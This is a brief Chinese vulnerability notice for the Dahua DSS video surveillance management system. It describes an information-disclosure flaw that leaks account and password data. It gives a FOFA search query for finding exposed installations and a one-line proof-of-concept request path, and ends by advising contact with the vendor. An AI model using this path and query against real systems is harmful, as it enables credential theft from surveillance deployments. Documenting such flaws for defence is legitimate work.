Nx01 产品简介
大华DSS数字监控系统是一个在通用安防视频监控系统基础上设计开发的系统,除了具有普通安防视频监控系统的实时监视、云台操作、录像回放、报警处理、设备治理等功能外,更注重用户使用的便利性。
Nx02 漏洞描述
大华DSS视频管理系统存在信息泄露漏洞,攻击者可以利用这个漏洞获取到系统的账号和密码信息。
Nx03 产品主页
fofa-query: app.name="Dahua 大华 DSS 视频管理系统"
Nx04 漏洞复现
POC:
/admin/cascade_/user_edit.action?id=1
Nx05 修复建议
建议联系软件厂商进行处理。